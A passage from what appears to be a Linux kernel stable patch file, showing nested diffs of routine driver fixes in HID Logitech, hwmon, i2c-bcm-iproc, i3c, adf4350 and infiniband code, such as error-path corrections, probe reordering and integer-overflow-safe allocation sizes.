+ 	    hidpp_application_equals(hdev, HID_GD_KEYBOARD))
+ 		hidpp->quirks |= HIDPP_QUIRK_HIDPP_CONSUMER_VENDOR_KEYS;
+ 
+-	if (disable_raw_mode) {
+-		hidpp->quirks &= ~HIDPP_QUIRK_CLASS_WTP;
+-		hidpp->quirks &= ~HIDPP_QUIRK_NO_HIDINPUT;
+-	}
+-
+ 	if (hidpp->quirks & HIDPP_QUIRK_CLASS_WTP) {
+ 		ret = wtp_allocate(hdev, id);
+ 		if (ret)
+@@ -4205,10 +4198,6 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			return ret;
+ 	}
+ 
+-	if (hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT ||
+-	    hidpp->quirks & HIDPP_QUIRK_UNIFYING)
+-		will_restart = true;
+-
+ 	INIT_WORK(&hidpp->work, delayed_work_cb);
+ 	mutex_init(&hidpp->send_mutex);
+ 	init_waitqueue_head(&hidpp->wait);
+@@ -4220,10 +4209,12 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			 hdev->name);
+ 
+ 	/*
+-	 * Plain USB connections need to actually call start and open
+-	 * on the transport driver to allow incoming data.
++	 * First call hid_hw_start(hdev, 0) to allow IO without connecting any
++	 * hid subdrivers (hid-input, hidraw). This allows retrieving the dev's
++	 * name and serial number and store these in hdev->name and hdev->uniq,
++	 * before the hid-input and hidraw drivers expose these to userspace.
+ 	 */
+-	ret = hid_hw_start(hdev, will_restart ? 0 : connect_mask);
++	ret = hid_hw_start(hdev, 0);
+ 	if (ret) {
+ 		hid_err(hdev, "hw start failed\n");
+ 		goto hid_hw_start_fail;
+@@ -4256,15 +4247,6 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 		hidpp_overwrite_name(hdev);
+ 	}
+ 
+-	if (connected && hidpp->protocol_major >= 2) {
+-		ret = hidpp_set_wireless_feature_index(hidpp);
+-		if (ret == -ENOENT)
+-			hidpp->wireless_feature_index = 0;
+-		else if (ret)
+-			goto hid_hw_init_fail;
+-		ret = 0;
+-	}
+-
+ 	if (connected && (hidpp->quirks & HIDPP_QUIRK_CLASS_WTP)) {
+ 		ret = wtp_get_config(hidpp);
+ 		if (ret)
+@@ -4278,21 +4260,14 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	schedule_work(&hidpp->work);
+ 	flush_work(&hidpp->work);
+ 
+-	if (will_restart) {
+-		/* Reset the HID node state */
+-		hid_device_io_stop(hdev);
+-		hid_hw_close(hdev);
+-		hid_hw_stop(hdev);
++	if (hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT)
++		connect_mask &= ~HID_CONNECT_HIDINPUT;
+ 
+-		if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
+-			connect_mask &= ~HID_CONNECT_HIDINPUT;
+-
+-		/* Now export the actual inputs and hidraw nodes to the world */
+-		ret = hid_hw_start(hdev, connect_mask);
+-		if (ret) {
+-			hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
+-			goto hid_hw_start_fail;
+-		}
++	/* Now export the actual inputs and hidraw nodes to the world */
++	ret = hid_connect(hdev, connect_mask);
++	if (ret) {
++		hid_err(hdev, "%s:hid_connect returned error %d\n", __func__, ret);
++		goto hid_hw_init_fail;
+ 	}
+ 
+ 	if (hidpp->quirks & HIDPP_QUIRK_CLASS_G920) {
+@@ -4303,6 +4278,11 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 				 ret);
+ 	}
+ 
++	/*
++	 * This relies on logi_dj_ll_close() being a no-op so that DJ connection
++	 * events will still be received.
++	 */
++	hid_hw_close(hdev);
+ 	return ret;
+ 
+ hid_hw_init_fail:
+diff --git a/drivers/hte/hte-tegra194-test.c b/drivers/hte/hte-tegra194-test.c
+index ce8c44e792213..60f0ef2cb324f 100644
+--- a/drivers/hte/hte-tegra194-test.c
++++ b/drivers/hte/hte-tegra194-test.c
+@@ -154,8 +154,10 @@ static int tegra_hte_test_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	cnt = of_hte_req_count(hte.pdev);
+-	if (cnt < 0)
++	if (cnt < 0) {
++		ret = cnt;
+ 		goto free_irq;
++	}
+ 
+ 	dev_info(&pdev->dev, "Total requested lines:%d\n", cnt);
+ 
+diff --git a/drivers/hwmon/axi-fan-control.c b/drivers/hwmon/axi-fan-control.c
+index 6724e0dd30880..25abf28084c96 100644
+--- a/drivers/hwmon/axi-fan-control.c
++++ b/drivers/hwmon/axi-fan-control.c
+@@ -496,6 +496,21 @@ static int axi_fan_control_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 	}
+ 
++	ret = axi_fan_control_init(ctl, pdev->dev.of_node);
++	if (ret) {
++		dev_err(&pdev->dev, "Failed to initialize device\n");
++		return ret;
++	}
++
++	ctl->hdev = devm_hwmon_device_register_with_info(&pdev->dev,
++							 name,
++							 ctl,
++							 &axi_chip_info,
++							 axi_fan_control_groups);
++
++	if (IS_ERR(ctl->hdev))
++		return PTR_ERR(ctl->hdev);
++
+ 	ctl->irq = platform_get_irq(pdev, 0);
+ 	if (ctl->irq < 0)
+ 		return ctl->irq;
+@@ -509,19 +524,7 @@ static int axi_fan_control_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = axi_fan_control_init(ctl, pdev->dev.of_node);
+-	if (ret) {
+-		dev_err(&pdev->dev, "Failed to initialize device\n");
+-		return ret;
+-	}
+-
+-	ctl->hdev = devm_hwmon_device_register_with_info(&pdev->dev,
+-							 name,
+-							 ctl,
+-							 &axi_chip_info,
+-							 axi_fan_control_groups);
+-
+-	return PTR_ERR_OR_ZERO(ctl->hdev);
++	return 0;
+ }
+ 
+ static struct platform_driver axi_fan_control_driver = {
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index baaf8af4cb443..09aab5859fa75 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -41,7 +41,7 @@ MODULE_PARM_DESC(tjmax, "TjMax value in degrees Celsius");
+ #define PKG_SYSFS_ATTR_NO	1	/* Sysfs attribute for package temp */
+ #define BASE_SYSFS_ATTR_NO	2	/* Sysfs Base attr no for coretemp */
+ #define NUM_REAL_CORES		128	/* Number of Real cores per cpu */
+-#define CORETEMP_NAME_LENGTH	19	/* String Length of attrs */
++#define CORETEMP_NAME_LENGTH	28	/* String Length of attrs */
+ #define MAX_CORE_ATTRS		4	/* Maximum no of basic attrs */
+ #define TOTAL_ATTRS		(MAX_CORE_ATTRS + 1)
+ #define MAX_CORE_DATA		(NUM_REAL_CORES + BASE_SYSFS_ATTR_NO)
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index c54233f0369b2..80310845fb993 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -1528,17 +1528,21 @@ struct nct6775_data *nct6775_update_device(struct device *dev)
+ 							  data->fan_div[i]);
+ 
+ 			if (data->has_fan_min & BIT(i)) {
+-				err = nct6775_read_value(data, data->REG_FAN_MIN[i], &reg);
++				u16 tmp;
++
++				err = nct6775_read_value(data, data->REG_FAN_MIN[i], &tmp);
+ 				if (err)
+ 					goto out;
+-				data->fan_min[i] = reg;
++				data->fan_min[i] = tmp;
+ 			}
+ 
+ 			if (data->REG_FAN_PULSES[i]) {
+-				err = nct6775_read_value(data, data->REG_FAN_PULSES[i], &reg);
++				u16 tmp;
++
++				err = nct6775_read_value(data, data->REG_FAN_PULSES[i], &tmp);
+ 				if (err)
+ 					goto out;
+-				data->fan_pulses[i] = (reg >> data->FAN_PULSE_SHIFT[i]) & 0x03;
++				data->fan_pulses[i] = (tmp >> data->FAN_PULSE_SHIFT[i]) & 0x03;
+ 			}
+ 
+ 			err = nct6775_select_fan_div(dev, data, i, reg);
+diff --git a/drivers/hwmon/sch5627.c b/drivers/hwmon/sch5627.c
+index 25fbbd4c9a2b3..886386272b9f4 100644
+--- a/drivers/hwmon/sch5627.c
++++ b/drivers/hwmon/sch5627.c
+@@ -6,6 +6,7 @@
+ 
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
++#include <linux/bits.h>
+ #include <linux/module.h>
+ #include <linux/mod_devicetable.h>
+ #include <linux/init.h>
+@@ -32,6 +33,10 @@
+ #define SCH5627_REG_PRIMARY_ID		0x3f
+ #define SCH5627_REG_CTRL		0x40
+ 
++#define SCH5627_CTRL_START		BIT(0)
++#define SCH5627_CTRL_LOCK		BIT(1)
++#define SCH5627_CTRL_VBAT		BIT(4)
++
+ #define SCH5627_NO_TEMPS		8
+ #define SCH5627_NO_FANS			4
+ #define SCH5627_NO_IN			5
+@@ -147,7 +152,8 @@ static int sch5627_update_in(struct sch5627_data *data)
+ 
+ 	/* Trigger a Vbat voltage measurement every 5 minutes */
+ 	if (time_after(jiffies, data->last_battery + 300 * HZ)) {
+-		sch56xx_write_virtual_reg(data->addr, SCH5627_REG_CTRL, data->control | 0x10);
++		sch56xx_write_virtual_reg(data->addr, SCH5627_REG_CTRL,
++					  data->control | SCH5627_CTRL_VBAT);
+ 		data->last_battery = jiffies;
+ 	}
+ 
+@@ -226,6 +232,14 @@ static int reg_to_rpm(u16 reg)
+ static umode_t sch5627_is_visible(const void *drvdata, enum hwmon_sensor_types type, u32 attr,
+ 				  int channel)
+ {
++	const struct sch5627_data *data = drvdata;
++
++	/* Once the lock bit is set, the virtual registers become read-only
++	 * until the next power cycle.
++	 */
++	if (data->control & SCH5627_CTRL_LOCK)
++		return 0444;
++
+ 	if (type == hwmon_pwm && attr == hwmon_pwm_auto_channels_temp)
+ 		return 0644;
+ 
+@@ -483,14 +497,13 @@ static int sch5627_probe(struct platform_device *pdev)
+ 		return val;
+ 
+ 	data->control = val;
+-	if (!(data->control & 0x01)) {
++	if (!(data->control & SCH5627_CTRL_START)) {
+ 		pr_err("hardware monitoring not enabled\n");
+ 		return -ENODEV;
+ 	}
+ 	/* Trigger a Vbat voltage measurement, so that we get a valid reading
+ 	   the first time we read Vbat */
+-	sch56xx_write_virtual_reg(data->addr, SCH5627_REG_CTRL,
+-				  data->control | 0x10);
++	sch56xx_write_virtual_reg(data->addr, SCH5627_REG_CTRL, data->control | SCH5627_CTRL_VBAT);
+ 	data->last_battery = jiffies;
+ 
+ 	/*
+diff --git a/drivers/hwmon/sch56xx-common.c b/drivers/hwmon/sch56xx-common.c
+index de3a0886c2f72..ac1f725807155 100644
+--- a/drivers/hwmon/sch56xx-common.c
++++ b/drivers/hwmon/sch56xx-common.c
+@@ -7,10 +7,8 @@
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
+ #include <linux/module.h>
+-#include <linux/mod_devicetable.h>
+ #include <linux/init.h>
+ #include <linux/platform_device.h>
+-#include <linux/dmi.h>
+ #include <linux/err.h>
+ #include <linux/io.h>
+ #include <linux/acpi.h>
+@@ -21,10 +19,7 @@
+ #include <linux/slab.h>
+ #include "sch56xx-common.h"
+ 
+-static bool ignore_dmi;
+-module_param(ignore_dmi, bool, 0);
+-MODULE_PARM_DESC(ignore_dmi, "Omit DMI check for supported devices (default=0)");
+-
++/* Insmod parameters */
+ static bool nowayout = WATCHDOG_NOWAYOUT;
+ module_param(nowayout, bool, 0);
+ MODULE_PARM_DESC(nowayout, "Watchdog cannot be stopped once started (default="
+@@ -523,66 +518,11 @@ static int __init sch56xx_device_add(int address, const char *name)
+ 	return PTR_ERR_OR_ZERO(sch56xx_pdev);
+ }
+ 
+-static const struct dmi_system_id sch56xx_dmi_override_table[] __initconst = {
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "CELSIUS W380"),
+-		},
+-	},
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ESPRIMO P710"),
+-		},
+-	},
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "ESPRIMO E9900"),
+-		},
+-	},
+-	{ }
+-};
+-
+-/* For autoloading only */
+-static const struct dmi_system_id sch56xx_dmi_table[] __initconst = {
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
+-		},
+-	},
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(dmi, sch56xx_dmi_table);
+-
+ static int __init sch56xx_init(void)
+ {
+-	const char *name = NULL;
+ 	int address;
++	const char *name = NULL;
+ 
+-	if (!ignore_dmi) {
+-		if (!dmi_check_system(sch56xx_dmi_table))
+-			return -ENODEV;
+-
+-		if (!dmi_check_system(sch56xx_dmi_override_table)) {
+-			/*
+-			 * Some machines like the Esprimo P720 and Esprimo C700 have
+-			 * onboard devices named " Antiope"/" Theseus" instead of
+-			 * "Antiope"/"Theseus", so we need to check for both.
+-			 */
+-			if (!dmi_find_device(DMI_DEV_TYPE_OTHER, "Antiope", NULL) &&
+-			    !dmi_find_device(DMI_DEV_TYPE_OTHER, " Antiope", NULL) &&
+-			    !dmi_find_device(DMI_DEV_TYPE_OTHER, "Theseus", NULL) &&
+-			    !dmi_find_device(DMI_DEV_TYPE_OTHER, " Theseus", NULL))
+-				return -ENODEV;
+-		}
+-	}
+-
+-	/*
+-	 * Some devices like the Esprimo C700 have both onboard devices,
+-	 * so we still have to check manually
+-	 */
+ 	address = sch56xx_find(0x4e, &name);
+ 	if (address < 0)
+ 		address = sch56xx_find(0x2e, &name);
+diff --git a/drivers/i2c/busses/i2c-bcm-iproc.c b/drivers/i2c/busses/i2c-bcm-iproc.c
+index 30a2a3200bed9..86a080f24d8a2 100644
+--- a/drivers/i2c/busses/i2c-bcm-iproc.c
++++ b/drivers/i2c/busses/i2c-bcm-iproc.c
+@@ -316,26 +316,44 @@ static void bcm_iproc_i2c_slave_init(
+ 	iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET, val);
+ }
+ 
+-static void bcm_iproc_i2c_check_slave_status(
+-	struct bcm_iproc_i2c_dev *iproc_i2c)
++static bool bcm_iproc_i2c_check_slave_status
++	(struct bcm_iproc_i2c_dev *iproc_i2c, u32 status)
+ {
+ 	u32 val;
++	bool recover = false;
+ 
+-	val = iproc_i2c_rd_reg(iproc_i2c, S_CMD_OFFSET);
+-	/* status is valid only when START_BUSY is cleared after it was set */
+-	if (val & BIT(S_CMD_START_BUSY_SHIFT))
+-		return;
++	/* check slave transmit status only if slave is transmitting */
++	if (!iproc_i2c->slave_rx_only) {
++		val = iproc_i2c_rd_reg(iproc_i2c, S_CMD_OFFSET);
++		/* status is valid only when START_BUSY is cleared */
++		if (!(val & BIT(S_CMD_START_BUSY_SHIFT))) {
++			val = (val >> S_CMD_STATUS_SHIFT) & S_CMD_STATUS_MASK;
++			if (val == S_CMD_STATUS_TIMEOUT ||
++			    val == S_CMD_STATUS_MASTER_ABORT) {
++				dev_warn(iproc_i2c->device,
++					 (val == S_CMD_STATUS_TIMEOUT) ?
++					 "slave random stretch time timeout\n" :
++					 "Master aborted read transaction\n");
++				recover = true;
++			}
++		}
++	}
++
++	/* RX_EVENT is not valid when START_BUSY is set */
++	if ((status & BIT(IS_S_RX_EVENT_SHIFT)) &&
++	    (status & BIT(IS_S_START_BUSY_SHIFT))) {
++		dev_warn(iproc_i2c->device, "Slave aborted read transaction\n");
++		recover = true;
++	}
+ 
+-	val = (val >> S_CMD_STATUS_SHIFT) & S_CMD_STATUS_MASK;
+-	if (val == S_CMD_STATUS_TIMEOUT || val == S_CMD_STATUS_MASTER_ABORT) {
+-		dev_err(iproc_i2c->device, (val == S_CMD_STATUS_TIMEOUT) ?
+-			"slave random stretch time timeout\n" :
+-			"Master aborted read transaction\n");
++	if (recover) {
+ 		/* re-initialize i2c for recovery */
+ 		bcm_iproc_i2c_enable_disable(iproc_i2c, false);
+ 		bcm_iproc_i2c_slave_init(iproc_i2c, true);
+ 		bcm_iproc_i2c_enable_disable(iproc_i2c, true);
+ 	}
++
++	return recover;
+ }
+ 
+ static void bcm_iproc_i2c_slave_read(struct bcm_iproc_i2c_dev *iproc_i2c)
+@@ -420,48 +438,6 @@ static bool bcm_iproc_i2c_slave_isr(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 	u32 val;
+ 	u8 value;
+ 
+-	/*
+-	 * Slave events in case of master-write, master-write-read and,
+-	 * master-read
+-	 *
+-	 * Master-write     : only IS_S_RX_EVENT_SHIFT event
+-	 * Master-write-read: both IS_S_RX_EVENT_SHIFT and IS_S_RD_EVENT_SHIFT
+-	 *                    events
+-	 * Master-read      : both IS_S_RX_EVENT_SHIFT and IS_S_RD_EVENT_SHIFT
+-	 *                    events or only IS_S_RD_EVENT_SHIFT
+-	 *
+-	 * iproc has a slave rx fifo size of 64 bytes. Rx fifo full interrupt
+-	 * (IS_S_RX_FIFO_FULL_SHIFT) will be generated when RX fifo becomes
+-	 * full. This can happen if Master issues write requests of more than
+-	 * 64 bytes.
+-	 */
+-	if (status & BIT(IS_S_RX_EVENT_SHIFT) ||
+-	    status & BIT(IS_S_RD_EVENT_SHIFT) ||
+-	    status & BIT(IS_S_RX_FIFO_FULL_SHIFT)) {
+-		/* disable slave interrupts */
+-		val = iproc_i2c_rd_reg(iproc_i2c, IE_OFFSET);
+-		val &= ~iproc_i2c->slave_int_mask;
+-		iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET, val);
+-
+-		if (status & BIT(IS_S_RD_EVENT_SHIFT))
+-			/* Master-write-read request */
+-			iproc_i2c->slave_rx_only = false;
+-		else
+-			/* Master-write request only */
+-			iproc_i2c->slave_rx_only = true;
+-
+-		/* schedule tasklet to read data later */
+-		tasklet_schedule(&iproc_i2c->slave_rx_tasklet);
+-
+-		/*
+-		 * clear only IS_S_RX_EVENT_SHIFT and
+-		 * IS_S_RX_FIFO_FULL_SHIFT interrupt.
+-		 */
+-		val = BIT(IS_S_RX_EVENT_SHIFT);
+-		if (status & BIT(IS_S_RX_FIFO_FULL_SHIFT))
+-			val |= BIT(IS_S_RX_FIFO_FULL_SHIFT);
+-		iproc_i2c_wr_reg(iproc_i2c, IS_OFFSET, val);
+-	}
+ 
+ 	if (status & BIT(IS_S_TX_UNDERRUN_SHIFT)) {
+ 		iproc_i2c->tx_underrun++;
+@@ -493,8 +469,9 @@ static bool bcm_iproc_i2c_slave_isr(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 		 * less than PKT_LENGTH bytes were output on the SMBUS
+ 		 */
+ 		iproc_i2c->slave_int_mask &= ~BIT(IE_S_TX_UNDERRUN_SHIFT);
+-		iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET,
+-				 iproc_i2c->slave_int_mask);
++		val = iproc_i2c_rd_reg(iproc_i2c, IE_OFFSET);
++		val &= ~BIT(IE_S_TX_UNDERRUN_SHIFT);
++		iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET, val);
+ 
+ 		/* End of SMBUS for Master Read */
+ 		val = BIT(S_TX_WR_STATUS_SHIFT);
+@@ -515,9 +492,49 @@ static bool bcm_iproc_i2c_slave_isr(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 				 BIT(IS_S_START_BUSY_SHIFT));
+ 	}
+ 
+-	/* check slave transmit status only if slave is transmitting */
+-	if (!iproc_i2c->slave_rx_only)
+-		bcm_iproc_i2c_check_slave_status(iproc_i2c);
++	/* if the controller has been reset, immediately return from the ISR */
++	if (bcm_iproc_i2c_check_slave_status(iproc_i2c, status))
++		return true;
++
++	/*
++	 * Slave events in case of master-write, master-write-read and,
++	 * master-read
++	 *
++	 * Master-write     : only IS_S_RX_EVENT_SHIFT event
++	 * Master-write-read: both IS_S_RX_EVENT_SHIFT and IS_S_RD_EVENT_SHIFT
++	 *                    events
++	 * Master-read      : both IS_S_RX_EVENT_SHIFT and IS_S_RD_EVENT_SHIFT
++	 *                    events or only IS_S_RD_EVENT_SHIFT
++	 *
++	 * iproc has a slave rx fifo size of 64 bytes. Rx fifo full interrupt
++	 * (IS_S_RX_FIFO_FULL_SHIFT) will be generated when RX fifo becomes
++	 * full. This can happen if Master issues write requests of more than
++	 * 64 bytes.
++	 */
++	if (status & BIT(IS_S_RX_EVENT_SHIFT) ||
++	    status & BIT(IS_S_RD_EVENT_SHIFT) ||
++	    status & BIT(IS_S_RX_FIFO_FULL_SHIFT)) {
++		/* disable slave interrupts */
++		val = iproc_i2c_rd_reg(iproc_i2c, IE_OFFSET);
++		val &= ~iproc_i2c->slave_int_mask;
++		iproc_i2c_wr_reg(iproc_i2c, IE_OFFSET, val);
++
++		if (status & BIT(IS_S_RD_EVENT_SHIFT))
++			/* Master-write-read request */
++			iproc_i2c->slave_rx_only = false;
++		else
++			/* Master-write request only */
++			iproc_i2c->slave_rx_only = true;
++
++		/* schedule tasklet to read data later */
++		tasklet_schedule(&iproc_i2c->slave_rx_tasklet);
++
++		/* clear IS_S_RX_FIFO_FULL_SHIFT interrupt */
++		if (status & BIT(IS_S_RX_FIFO_FULL_SHIFT)) {
++			val = BIT(IS_S_RX_FIFO_FULL_SHIFT);
++			iproc_i2c_wr_reg(iproc_i2c, IS_OFFSET, val);
++		}
++	}
+ 
+ 	return true;
+ }
+diff --git a/drivers/i3c/master.c b/drivers/i3c/master.c
+index 351c81a929a6c..ab0b5691b03e0 100644
+--- a/drivers/i3c/master.c
++++ b/drivers/i3c/master.c
+@@ -1508,9 +1508,11 @@ i3c_master_register_new_i3c_devs(struct i3c_master_controller *master)
+ 			desc->dev->dev.of_node = desc->boardinfo->of_node;
+ 
+ 		ret = device_register(&desc->dev->dev);
+-		if (ret)
++		if (ret) {
+ 			dev_err(&master->dev,
+ 				"Failed to add I3C device (err = %d)\n", ret);
++			put_device(&desc->dev->dev);
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/iio/frequency/adf4350.c b/drivers/iio/frequency/adf4350.c
+index 85e289700c3c5..4abf80f75ef5d 100644
+--- a/drivers/iio/frequency/adf4350.c
++++ b/drivers/iio/frequency/adf4350.c
+@@ -33,7 +33,6 @@ enum {
+ 
+ struct adf4350_state {
+ 	struct spi_device		*spi;
+-	struct regulator		*reg;
+ 	struct gpio_desc		*lock_detect_gpiod;
+ 	struct adf4350_platform_data	*pdata;
+ 	struct clk			*clk;
+@@ -469,6 +468,15 @@ static struct adf4350_platform_data *adf4350_parse_dt(struct device *dev)
+ 	return pdata;
+ }
+ 
++static void adf4350_power_down(void *data)
++{
++	struct iio_dev *indio_dev = data;
++	struct adf4350_state *st = iio_priv(indio_dev);
++
++	st->regs[ADF4350_REG2] |= ADF4350_REG2_POWER_DOWN_EN;
++	adf4350_sync_config(st);
++}
++
+ static int adf4350_probe(struct spi_device *spi)
+ {
+ 	struct adf4350_platform_data *pdata;
+@@ -491,31 +499,21 @@ static int adf4350_probe(struct spi_device *spi)
+ 	}
+ 
+ 	if (!pdata->clkin) {
+-		clk = devm_clk_get(&spi->dev, "clkin");
++		clk = devm_clk_get_enabled(&spi->dev, "clkin");
+ 		if (IS_ERR(clk))
+-			return -EPROBE_DEFER;
+-
+-		ret = clk_prepare_enable(clk);
+-		if (ret < 0)
+-			return ret;
++			return PTR_ERR(clk);
+ 	}
+ 
+ 	indio_dev = devm_iio_device_alloc(&spi->dev, sizeof(*st));
+-	if (indio_dev == NULL) {
+-		ret =  -ENOMEM;
+-		goto error_disable_clk;
+-	}
++	if (indio_dev == NULL)
++		return -ENOMEM;
+ 
+ 	st = iio_priv(indio_dev);
+ 
+-	st->reg = devm_regulator_get(&spi->dev, "vcc");
+-	if (!IS_ERR(st->reg)) {
+-		ret = regulator_enable(st->reg);
+-		if (ret)
+-			goto error_disable_clk;
+-	}
++	ret = devm_regulator_get_enable(&spi->dev, "vcc");
++	if (ret)
++		return ret;
+ 
+-	spi_set_drvdata(spi, indio_dev);
+ 	st->spi = spi;
+ 	st->pdata = pdata;
+ 
+@@ -544,47 +542,21 @@ static int adf4350_probe(struct spi_device *spi)
+ 
+ 	st->lock_detect_gpiod = devm_gpiod_get_optional(&spi->dev, NULL,
+ 							GPIOD_IN);
+-	if (IS_ERR(st->lock_detect_gpiod)) {
+-		ret = PTR_ERR(st->lock_detect_gpiod);
+-		goto error_disable_reg;
+-	}
++	if (IS_ERR(st->lock_detect_gpiod))
++		return PTR_ERR(st->lock_detect_gpiod);
+ 
+ 	if (pdata->power_up_frequency) {
+ 		ret = adf4350_set_freq(st, pdata->power_up_frequency);
+ 		if (ret)
+-			goto error_disable_reg;
++			return ret;
+ 	}
+ 
+-	ret = iio_device_register(indio_dev);
++	ret = devm_add_action_or_reset(&spi->dev, adf4350_power_down, indio_dev);
+ 	if (ret)
+-		goto error_disable_reg;
+-
+-	return 0;
+-
+-error_disable_reg:
+-	if (!IS_ERR(st->reg))
+-		regulator_disable(st->reg);
+-error_disable_clk:
+-	clk_disable_unprepare(clk);
+-
+-	return ret;
+-}
+-
+-static void adf4350_remove(struct spi_device *spi)
+-{
+-	struct iio_dev *indio_dev = spi_get_drvdata(spi);
+-	struct adf4350_state *st = iio_priv(indio_dev);
+-	struct regulator *reg = st->reg;
+-
+-	st->regs[ADF4350_REG2] |= ADF4350_REG2_POWER_DOWN_EN;
+-	adf4350_sync_config(st);
+-
+-	iio_device_unregister(indio_dev);
+-
+-	clk_disable_unprepare(st->clk);
++		return dev_err_probe(&spi->dev, ret,
++				     "Failed to add action to managed power down\n");
+ 
+-	if (!IS_ERR(reg))
+-		regulator_disable(reg);
++	return devm_iio_device_register(&spi->dev, indio_dev);
+ }
+ 
+ static const struct of_device_id adf4350_of_match[] = {
+@@ -607,7 +579,6 @@ static struct spi_driver adf4350_driver = {
+ 		.of_match_table = adf4350_of_match,
+ 	},
+ 	.probe		= adf4350_probe,
+-	.remove		= adf4350_remove,
+ 	.id_table	= adf4350_id,
+ };
+ module_spi_driver(adf4350_driver);
+diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
+index 3c422698a51c1..3a9b9a28d858f 100644
+--- a/drivers/infiniband/core/device.c
++++ b/drivers/infiniband/core/device.c
+@@ -804,7 +804,7 @@ static int alloc_port_data(struct ib_device *device)
+ 	 * empty slots at the beginning.
+ 	 */
+ 	pdata_rcu = kzalloc(struct_size(pdata_rcu, pdata,
+-					rdma_end_port(device) + 1),
++					size_add(rdma_end_port(device), 1)),
+ 			    GFP_KERNEL);
+ 	if (!pdata_rcu)
+ 		return -ENOMEM;
+diff --git a/drivers/infiniband/core/sa_query.c b/drivers/infiniband/core/sa_query.c
+index 0de83d9a4985d..8c69bdb5bb754 100644
+--- a/drivers/infiniband/core/sa_query.c
++++ b/drivers/infiniband/core/sa_query.c
+@@ -2220,7 +2220,9 @@ static int ib_sa_add_one(struct ib_device *device)
+ 	s = rdma_start_port(device);
+ 	e = rdma_end_port(device);
+ 
+-	sa_dev = kzalloc(struct_size(sa_dev, port, e - s + 1), GFP_KERNEL);
++	sa_dev = kzalloc(struct_size(sa_dev, port,
++				     size_add(size_sub(e, s), 1)),
++			 GFP_KERNEL);
+ 	if (!sa_dev)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/infiniband/core/sysfs.c b/drivers/infiniband/core/sysfs.c
+index ee59d73915689..ec5efdc166601 100644
+--- a/drivers/infiniband/core/sysfs.c
++++ b/drivers/infiniband/core/sysfs.c
+@@ -903,7 +903,7 @@ alloc_hw_stats_device(struct ib_device *ibdev)
+ 	 * Two extra attribue elements here, one for the lifespan entry and
+ 	 * one to NULL terminate the list for the sysfs core code
+ 	 */
+-	data = kzalloc(struct_size(data, attrs, stats->num_counters + 1),
++	data = kzalloc(struct_size(data, attrs, size_add(stats->num_counters, 1)),
+ 		       GFP_KERNEL);
+ 	if (!data)
+ 		goto err_free_stats;
+@@ -1009,7 +1009,7 @@ alloc_hw_stats_port(struct ib_port *port, struct attribute_group *group)
+ 	 * Two extra attribue elements here, one for the lifespan entry and
+ 	 * one to NULL terminate the list for the sysfs core code
+ 	 */
+-	data = kzalloc(struct_size(data, attrs, stats->num_counters + 1),
++	data = kzalloc(struct_size(data, attrs, size_add(stats->num_counters, 1)),
+ 		       GFP_KERNEL);
+ 	if (!data)
+ 		goto err_free_stats;
+@@ -1140,7 +1140,7 @@ static int setup_gid_attrs(struct ib_port *port,
+ 	int ret;
+ 
+ 	gid_attr_group = kzalloc(struct_size(gid_attr_group, attrs_list,
+-					     attr->gid_tbl_len * 2),
++					     size_mul(attr->gid_tbl_len, 2)),
+ 				 GFP_KERNEL);
+ 	if (!gid_attr_group)
+ 		return -ENOMEM;
+@@ -1205,8 +1205,8 @@ static struct ib_port *setup_port(struct ib_core_device *coredev, int port_num,
+ 	int ret;
+ 
+ 	p = kvzalloc(struct_size(p, attrs_list,
+-				attr->gid_tbl_len + attr->pkey_tbl_len),
+-		    GFP_KERNEL);
++				size_add(attr->gid_tbl_len, attr->pkey_tbl_len)),
++		     GFP_KERNEL);
+ 	if (!p)
+ 		return ERR_PTR(-ENOMEM);
+ 	p->ibdev = device;
+diff --git a/drivers/infiniband/core/user_mad.c b/drivers/infiniband/core/user_mad.c
+index 98cb594cd9a69..d96c78e436f98 100644
+--- a/drivers/infiniband/core/user_mad.c
++++ b/drivers/infiniband/core/user_mad.c
+@@ -1373,7 +1373,9 @@ static int ib_umad_add_one(struct ib_device *device)
+ 	s = rdma_start_port(device);
+ 	e = rdma_end_port(device);
+ 
+-	umad_dev = kzalloc(struct_size(umad_dev, ports, e - s + 1), GFP_KERNEL);
++	umad_dev = kzalloc(struct_size(umad_dev, ports,
